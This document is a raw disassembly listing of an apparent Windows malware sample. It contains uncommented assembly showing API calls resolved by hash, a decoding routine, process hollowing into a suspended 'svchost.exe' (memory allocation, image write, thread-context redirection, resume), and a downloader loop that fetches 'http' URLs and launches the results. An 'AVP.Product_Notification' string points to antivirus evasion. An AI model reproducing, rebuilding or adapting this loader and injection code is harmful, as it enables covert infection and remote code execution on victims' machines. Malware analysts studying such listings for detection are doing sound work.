mov ecx, [ebp+var_4]
shr ecx, 2
cld
loc_402C3C: ; CODE XREF: sub_402C03+6C�j
push ecx
push 4
pop ecx
xor ebx, ebx
lodsd
loc_402C43: ; CODE XREF: sub_402C03+5A�j
push eax
and eax, 0FFh
mov al, ds:byte_402B04[eax]
cmp al, 0FFh
jz short loc_402C75
shl ebx, 6
or bl, al
pop eax
shr eax, 8
dec ecx
jnz short loc_402C43
mov eax, ebx
shl eax, 8
xchg ah, al
ror eax, 10h
xchg ah, al
stosd
dec edi
pop ecx
dec ecx
jnz short loc_402C3C
xor eax, eax
jmp short loc_402C7A
; ---------------------------------------------------------------------------
loc_402C75: ; CODE XREF: sub_402C03+4E�j
mov eax, 0FFFFFFFFh
loc_402C7A: ; CODE XREF: sub_402C03+70�j
popa
leave
retn 8
sub_402C03 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C7F proc near ; CODE XREF: sub_402EB4+191�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push [ebp+arg_0]
pop ecx
mov ebx, ecx
add ebx, [ebp+arg_4]
loc_402C8E: ; CODE XREF: sub_402C7F+1E�j
mov al, [ecx]
cmp al, [ebp+arg_8]
jnz short loc_402C9A
mov al, [ebp+arg_C]
mov [ecx], al
loc_402C9A: ; CODE XREF: sub_402C7F+14�j
inc ecx
cmp ecx, ebx
jnz short loc_402C8E
pop ecx
pop ebx
pop eax
leave
retn 10h
sub_402C7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CA6 proc near ; DATA XREF: sub_402CFD+166�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_402CA9: ; CODE XREF: sub_402CA6+37�j
push 1F4h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_402CC6
; ---------------------------------------------------------------------------
dword_402CC2 dd 0DF898656h ; sub_402E82+6�r
; ---------------------------------------------------------------------------
loc_402CC6: ; CODE XREF: sub_402CA6+1A�j
push [ebp+arg_0]
push ds:dword_402CC2
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jz short loc_402CA9
jmp short loc_402CE5
; ---------------------------------------------------------------------------
dword_402CE1 dd 4FB00368h ; ---------------------------------------------------------------------------
loc_402CE5: ; CODE XREF: sub_402CA6+39�j
push 0
push ds:dword_402CE1
push offset byte_4013A9
call sub_4011F2
call eax
leave
retn 4
sub_402CA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CFD proc near ; CODE XREF: sub_402EB4+11D�p
; sub_402EB4+215�p ...
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push 105h
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_4], eax
jmp short loc_402D25
; ---------------------------------------------------------------------------
dword_402D21 dd 0B396ED80h ; ---------------------------------------------------------------------------
loc_402D25: ; CODE XREF: sub_402CFD+22�j
push [ebp+var_4]
push 0
push 0
push offset word_402B02
push ds:dword_402D21
push offset byte_4013A9
call sub_4011F2
call eax
loc_402D43: ; CODE XREF: sub_402CFD+107�j
jmp short loc_402D4E
; ---------------------------------------------------------------------------
byte_402D45 db 0, 0Dh, 6 ; DATA XREF: sub_402CFD+69�o
dd 2EBC4658h
db 62h, 5Ah
; ---------------------------------------------------------------------------
loc_402D4E: ; CODE XREF: sub_402CFD:loc_402D43�j
jmp short loc_402D54
; ---------------------------------------------------------------------------
dword_402D50 dd 0E29B105Dh ; ---------------------------------------------------------------------------
loc_402D54: ; CODE XREF: sub_402CFD:loc_402D4E�j
push 0
push 0
push [ebp+var_4]
push [ebp+arg_0]
push 0
push ds:dword_402D50
push offset byte_402D45
call sub_4011F2
call eax
cmp [ebp+arg_4], 1
jnz loc_402E09
push 400h
push offset dword_414094
call sub_401038
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+var_4]
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz short loc_402E09
mov [ebp+var_10], eax
push 0
push offset dword_405000
push 400h
push offset dword_414094
push [ebp+var_10]
push ds:dword_401AB4
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_10]
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
cmp dword_405000, 0
jnz short loc_402E09
cmp [ebp+arg_C], 1
jnz short loc_402E09
jmp loc_402D43
; ---------------------------------------------------------------------------
loc_402E09: ; CODE XREF: sub_402CFD+79�j
; sub_402CFD+B8�j ...
cmp [ebp+arg_8], 1
jnz short loc_402E59
mov dword_407028, 1
mov word_40702C, 0Ah
push offset dword_407040
push offset dword_406FFC
push 0
push 0
push 0
push 0
push 0
push 0
push [ebp+var_4]
push 0
push ds:dword_4026A7
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jz short loc_402E59
inc dword_414AAE
loc_402E59: ; CODE XREF: sub_402CFD+110�j
; sub_402CFD+154�j
push offset dword_405000
push 0
push [ebp+var_4]
push offset sub_402CA6
push 0
push 0
push ds:dword_4025DF
push offset byte_4013A9
call sub_4011F2
call eax
leave
retn 10h
sub_402CFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402E82 proc near ; CODE XREF: sub_402E82+2F�j
; DATA XREF: sub_402EB4+D1�o
push dword_413C90
push ds:dword_402CC2
push offset byte_4013A9
call sub_4011F2
call eax
push 0FAh
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
jmp short sub_402E82
sub_402E82 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402EB4 proc near ; DATA XREF: start+1A2�o
; .data:off_407118�o
push offset byte_402AC9
call sub_401380
jmp short loc_402EC4
; ---------------------------------------------------------------------------
dword_402EC0 dd 0A8A607CBh ; sub_402EB4+36�r ...
; ---------------------------------------------------------------------------
loc_402EC4: ; CODE XREF: sub_402EB4+A�j
push offset aSvchost_exe ; "svchost.exe "
push ds:dword_402EC0
push offset byte_4013A9
call sub_4011F2
call eax
push offset word_402AB6
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push ds:dword_402EC0
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_402F02
; ---------------------------------------------------------------------------
dword_402EFE dd 6C294170h ; ---------------------------------------------------------------------------
loc_402F02: ; CODE XREF: sub_402EB4+48�j
push ds:dword_402EFE
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_402F1A
; ---------------------------------------------------------------------------
dword_402F16 dd 0A0D1E303h ; ---------------------------------------------------------------------------
loc_402F1A: ; CODE XREF: sub_402EB4+60�j
push offset dword_4148A0
push 105h
push ds:dword_402F16
push offset byte_4013A9
call sub_4011F2
call eax
push offset dword_402AD8
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push ds:dword_402EC0
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_402F5D
; ---------------------------------------------------------------------------
dword_402F59 dd 0ADE88485h ; ---------------------------------------------------------------------------
loc_402F5D: ; CODE XREF: sub_402EB4+A3�j
push ds:dword_402F59
push offset byte_4013A9
call sub_4011F2
call eax
add eax, 0Ch
mov dword_413C90, eax
call sub_402928
push offset dword_405000
push 0
push 0
push offset sub_402E82
push 0
push 0
push ds:dword_4025DF
push offset byte_4013A9
call sub_4011F2
call eax
push offset dword_402A28
call sub_401380
push offset byte_406FA1
push offset aSvchost_exe ; "svchost.exe "
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
push 1
push 0
push 1
push offset aSvchost_exe ; "svchost.exe "
call sub_402CFD
push offset dword_414494
push offset dword_414094
call sub_402C03
jmp short loc_402FEB
; ---------------------------------------------------------------------------
dword_402FE7 dd 123607F0h ; ---------------------------------------------------------------------------
loc_402FEB: ; CODE XREF: sub_402EB4+131�j
push 4
push offset dword_414494
push ds:dword_402FE7
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_40301F
lea edi, dword_414494
mov ah, [edi]
cmp ah, 31h
jnz short loc_40301F
mov dword_414ABA, 1
loc_40301F: ; CODE XREF: sub_402EB4+152�j
; sub_402EB4+15F�j
push offset dword_414494
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_414894, eax
push 0
push 20h
push eax
push offset dword_414494
call sub_402C7F
mov edi, offset dword_414494
mov dword_414898, 0
push 0
pop dword_414AAA
push 0
pop dword_414AAE
loc_403069: ; CODE XREF: sub_402EB4+224�j
push edi
push offset dword_413C94
push ds:dword_401724
push offset byte_4013A9
call sub_4011F2
call eax
push offset dword_413C94
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_4030A6
mov dword_414898, 1
loc_4030A6: ; CODE XREF: sub_402EB4+1E6�j
add edi, eax
inc edi
push edi
mov edi, offset dword_413C94
mov eax, [edi]
cmp eax, 70747468h
jnz short loc_4030CE
inc dword_414AAA
push 1
push 1
push 0
push offset dword_413C94
call sub_402CFD
loc_4030CE: ; CODE XREF: sub_402EB4+202�j
pop edi
cmp dword_414898, 0
jnz short loc_4030DA
jmp short loc_403069
; ---------------------------------------------------------------------------
loc_4030DA: ; CODE XREF: sub_402EB4+222�j
mov eax, dword_414AAA
cmp eax, dword_414AAE
jnz short loc_40310E
or eax, eax
jz short loc_40310E
cmp dword_414ABA, 0
jbe short loc_40310E
push offset byte_402A6D
call sub_401380
push 1
push 0
push 0
push offset aSvchost_exe ; "svchost.exe "
call sub_402CFD
loc_40310E: ; CODE XREF: sub_402EB4+231�j
; sub_402EB4+235�j ...
push 32h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax ; dword_414AAA
cmp dword_414AAA, 0
jnz short loc_40310E
push 36B0h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax ; dword_414AAA
push 0
push ds:dword_401FF4
push offset byte_4013A9
call sub_4011F2
call eax ; dword_414AAA
retn
sub_402EB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403157 proc near ; CODE XREF: start�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
push ebp
mov ebp, esp
add esp, 0FFFFFF68h
lea eax, [ebp+var_94]
mov [ebp+var_98], eax
push 94h
push [ebp+var_98]
call sub_401038
mov [ebp+var_94], 94h
jmp short loc_40318C
; ---------------------------------------------------------------------------
dword_403188 dd 74C0FDBDh ; ---------------------------------------------------------------------------
loc_40318C: ; CODE XREF: sub_403157+2F�j
push [ebp+var_98]
push ds:dword_403188
push offset byte_4013A9
call sub_4011F2
call eax
cmp [ebp+var_90], 5
jbe short locret_4031C1
push 0
push ds:dword_401FF4
push offset byte_4013A9
call sub_4011F2
call eax
locret_4031C1: ; CODE XREF: sub_403157+54�j
leave
retn
sub_403157 endp
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_403157
call sub_40278E
push 0
pop eax
call sub_4016F9
push 1
pop eax
call sub_4025DD
push 400h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
push ds:dword_401B46
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_406FFC, 44h
mov dword_407028, 1
mov word_40702C, 2
push offset byte_402AE7
call sub_401380
push offset aSvchost_exe ; "svchost.exe "
push offset aSvchost_exeCM_ ; "svchost.exe C:\\m_unpacker\\packed.exe"
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
nop
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push offset aSvchost_exeCM_ ; "svchost.exe C:\\m_unpacker\\packed.exe"
push ds:dword_4022AC
push offset byte_4013A9
call sub_4011F2
call eax
push offset dword_407040
push offset dword_406FFC
push 0
push 0
push 4
push 0
push 0
push 0
push offset aSvchost_exeCM_ ; "svchost.exe C:\\m_unpacker\\packed.exe"
push 0
push ds:dword_4026A7
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_403293
jmp loc_4033E1
; ---------------------------------------------------------------------------
loc_403293: ; CODE XREF: start+C9�j
push 0
push ds:dword_401B2C
push offset byte_4013A9
call sub_4011F2
call eax
push eax
pop dword_407334
mov edi, eax
add edi, [edi+3Ch]
add edi, 4
add edi, 14h
mov eax, [edi+38h]
push eax
pop dword_407050
jmp short loc_4032C9
; ---------------------------------------------------------------------------
dword_4032C5 dd 0AE6099A5h ; ---------------------------------------------------------------------------
loc_4032C9: ; CODE XREF: start+100�j
push 40h
push 3000h
push dword_407050
push dword_407334
push dword_407040
push ds:dword_4032C5
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_407054, eax
jmp short loc_4032FF
; ---------------------------------------------------------------------------
dword_4032FB dd 788B5763h ; ---------------------------------------------------------------------------
loc_4032FF: ; CODE XREF: start+136�j
push offset dword_407058
push dword_407050
push dword_407334
push dword_407054
push dword_407040
push ds:dword_4032FB
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_403337
jmp loc_4033E1
; ---------------------------------------------------------------------------
loc_403337: ; CODE XREF: start+16D�j
push 10007h
pop dword_407060
jmp short loc_403348
; ---------------------------------------------------------------------------
dword_403344 dd 0D55BA83Bh ; ---------------------------------------------------------------------------
loc_403348: ; CODE XREF: start+17F�j
push offset dword_407060
push dword_407044
push ds:dword_403344
push offset byte_4013A9
call sub_4011F2
call eax
mov off_407118, offset sub_402EB4
jmp short loc_403375
; ---------------------------------------------------------------------------
dword_403371 dd 0E97F2AB5h ; ---------------------------------------------------------------------------
loc_403375: ; CODE XREF: start+1AC�j
push offset dword_407060
push dword_407044
push ds:dword_403371
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_403398
jmp short loc_4033E1
; ---------------------------------------------------------------------------
loc_403398: ; CODE XREF: start+1D1�j
jmp short loc_40339E
; ---------------------------------------------------------------------------
dword_40339A dd 0AFABBFDEh ; ---------------------------------------------------------------------------
loc_40339E: ; CODE XREF: start:loc_403398�j
push dword_407044
push ds:dword_40339A
push offset byte_4013A9
call sub_4011F2
call eax
push 34BCh
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
push 0
push ds:dword_401FF4
push offset byte_4013A9
call sub_4011F2
call eax
loc_4033E1: ; CODE XREF: start+CB�j start+16F�j ...
call sub_401D9E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033E6 proc near ; CODE XREF: sub_40118F+35�p
jmp ds:dword_404000
sub_4033E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033EC proc near ; CODE XREF: sub_4011F2+14�p
jmp ds:dword_404004
sub_4033EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4033F2 proc near ; CODE XREF: sub_401086+DE�p
; sub_40118F+3C�p
jmp ds:dword_404008
sub_4033F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033F8 proc near ; CODE XREF: sub_40287E+3C�p
; sub_40287E+A0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov edx, [ebp+arg_4]
mov esi, [ebp+arg_0]
xor eax, eax
xor ecx, ecx
mov [edx+8], al
mov cl, 7
loc_40340B: ; CODE XREF: sub_4033F8+23�j
mov eax, esi
and al, 0Fh
cmp al, 0Ah
sbb al, 69h
das
mov [ecx+edx], al
shr esi, 4
dec ecx
jns short loc_40340B
pop esi
leave
retn 8
sub_4033F8 endp
; ---------------------------------------------------------------------------
dw ?
dd 77h dup(?)
_text ends
; Section 2. (virtual address 00004000)
; Virtual size : 0000007E ( 126.)
; Section size in file : 0000007E ( 126.)
; Offset to raw data for section: 00004000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 404000h
dword_404000 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_404004 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_404008 dd 7C802442h ; resolved to->KERNEL32.Sleep align 10h
dd 4038h, 2 dup(0)
dd 4070h, 4000h, 5 dup(0)
dd 4048h, 4058h, 4068h, 0
dd 72430046h, 65746165h, 65726854h, 6461h, 6F4C01A4h, 694C6461h
dd 72617262h, 4179h, 6C530260h, 706565h, 6E72656Bh, 32336C65h
dd 6C6C642Eh
align 200h
_rdata ends
; Section 3. (virtual address 00005000)
; Virtual size : 0000FABE ( 64190.)
; Section size in file : 0000FABE ( 64190.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 405000h
dword_405000 dd 4278h ; sub_401A2C+8E�o ...
dword_405004 dd 4 ; sub_401086:loc_40117C�o
dword_405008 dd 0 ; sub_40118F+7�w
dword_40500C dd 0 ; sub_401086+41�r ...
dword_405010 dd 101h dup(0) ; sub_401086:loc_4010D8�o ...
db 0
aSvchost_exe db 'svchost.exe ',0 ; DATA XREF: sub_401380+C�o
; sub_4016F9:loc_401728�o ...
align 4
dd 102h dup(0)
dword_40582C dd 0 ; sub_4013A4:loc_40146D�r
dword_405830 dd 0 ; sub_4013A4+AE�r ...
dword_405834 dd 0 ; sub_4013A4+58�w ...
dword_405838 dd 41h dup(0) ; sub_4013A4:loc_401433�o
db 0
dword_40593D dd 0E4h ; sub_40147D+42�r ...
dword_405941 dd 128h ; sub_40147D:loc_4014BA�o ...
db 51h, 5, 91h
db 7Ch
dword_405949 dd 140AD8h db 6Dh, 5, 91h
dd 14314A7Ch, 0
dd 205C400h, 800h, 0
db 0
aPacked_exe db 'packed.exe',0 ; DATA XREF: sub_40147D:loc_4014DC�o
aE db 'e',0
a_exe db '.exe',0
align 4
dd 3Ch dup(0)
db 0
dword_405A69 dd 0 ; sub_4016F9+BB�r ...
dword_405A6D dd 0 ; sub_4016F9+E5�o
dword_405A71 dd 0 ; sub_4016F9:loc_401822�r
dword_405A75 dd 0 dword_405A79 dd 0 byte_405A7D db 3 dup(0) ; DATA XREF: sub_4016F9+34�o
; sub_4016F9+EE�o
dd 4 dup(0)
db 0
byte_405A91 db 3 dup(0) ; DATA XREF: sub_401896+2A�o
; sub_401896+4A�o ...
dd 100h dup(0)
dword_405E94 dd 0 ; sub_401D9E+50�r ...
dword_405E98 dd 0 ; sub_401D9E+82�w ...
dword_405E9C dd 0 ; sub_401D9E+68�r ...
dword_405EA0 dd 0 ; sub_401D9E+89�o ...
dword_405EA4 dd 0 ; sub_401D9E+EE�r ...
dword_405EA8 dd 0 dword_405EAC dd 145350h ; sub_401D11+5A�r ...
dword_405EB0 dd 0 ; sub_401D11+44�w ...
dword_405EB4 dd 0 ; sub_401D9E+2DC�r
dword_405EB8 dd 0 ; sub_401D9E+20A�r ...
dword_405EBC dd 0 ; sub_401D9E:loc_401F49�o
dword_405EC0 dd 0 dd 5 dup(0)
dword_405ED8 dd 0 ; sub_401D9E+214�r
dword_405EDC dd 0 ; sub_401A2C+99�r ...
dword_405EE0 dd 0 ; sub_401A2C+61�r ...
dd 141h dup(0)
db 0
byte_4063E9 db 3 dup(0) ; DATA XREF: sub_402281+12�o
; sub_402281+34�o ...
dd 0FFh dup(0)
db 0
byte_4067E9 db 49h, 4Dh, 45h ; DATA XREF: sub_4024E6+19�o
; sub_4024E6+3E�o
dd 4D494600h, 49552045h, 33737300h, 32h, 73h, 0FAh dup(0)
db 0
byte_406BE9 db 3 dup(0) ; DATA XREF: sub_402281+16E�o
; sub_4025DD+A2�o
dd 31h dup(0)
db 0
aAvp_product_no db 'AVP.Product_Notification',0 ; DATA XREF: sub_4024E6:loc_40251F�o
; .text:0040256E�o ...
align 4
dd 12h dup(0)
db 0
dword_406D15 dd 0 ; sub_40242A+6F�r ...
dword_406D19 dd 0 ; sub_402281+C8�r ...
byte_406D1D db 3 dup(0) ; DATA XREF: sub_40242A+67�o
; sub_40242A+92�o
dd 7Fh dup(0)
db 0
dword_406F1D dd 0 ; sub_402281+B2�o ...
dword_406F21 dd 344h ; sub_402281+BC�o ...
dword_406F25 dd 0 ; sub_40242A+8�w ...
dword_406F29 dd 0 ; sub_4025DD+D3�o
align 10h
dd 0Fh dup(0)
db 0
byte_406F6D db 3 dup(0) ; DATA XREF: sub_4025DD:loc_4026AB�o
dd 3 dup(0)
db 0
dword_406F7D dd 0 ; sub_40278E+67�r ...
byte_406F81 db 3 dup(0) ; DATA XREF: sub_40278E+60�o
dd 7 dup(0)
db 0
byte_406FA1 db 3 dup(0) ; DATA XREF: sub_40287E+9�o
; sub_40287E+34�o ...
dd 13h dup(0)
db 2 dup(0)
dword_406FF2 dd 0 ; sub_402928+B5�r ...
align 4
dd 0
dword_406FFC dd 44h dd 0Ah dup(0)
dword_407028 dd 1 word_40702C dw 2 ; DATA XREF: sub_402CFD+11C�w start+4C�w
align 10h
dd 4 dup(0)
dword_407040 dd 250h dword_407044 dd 258h dd 10Ch, 47Ch
dword_407050 dd 16000h dword_407054 dd 400000h dword_407058 dd 16000h, 0 dword_407060 dd 10007h ; start:loc_403348�o ...
dd 23h dup(0)
dd 38h, 2 dup(23h), 12F804h, 8, 7FFDF000h, 7C90EE18h, 7C910570h
dd 1002509h, 7C91056Dh
off_407118 dd offset sub_402EB4 ; DATA XREF: start+1A2�w
dd 1Bh, 200h, 7FFFCh, 23h, 82h dup(0)
dword_407334 dd 400000h dd 0
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: start+1F�o
; start+7C�o
align 4
dd 79h dup(0)
aSvchost_exeCM_ db 'svchost.exe C:\m_unpacker\packed.exe',0 ; DATA XREF: start+64�o
; start+81�o ...
align 4
dd 31CBh dup(0)
dword_413C90 dd 0 ; sub_402EB4+BE�w
dword_413C94 dd 100h dup(0) ; sub_402EB4+1CD�o ...
dword_414094 dd 100h dup(0) ; sub_402CFD+C9�o ...
dword_414494 dd 100h dup(0) ; sub_402EB4+139�o ...
dword_414894 dd 0 dword_414898 dd 0 ; sub_402EB4+1E8�w ...
align 10h
dword_4148A0 dd 82h dup(0) db 2 dup(0)
dword_414AAA dd 0 ; sub_402EB4+204�w ...
dword_414AAE dd 0 ; sub_402EB4+1AF�w ...
align 4
dd 0
db 2 dup(0)
dword_414ABA dd 0 ; sub_402EB4+237�r
align 200h
_data ends
; Section 5. (virtual address 00016000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 416000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start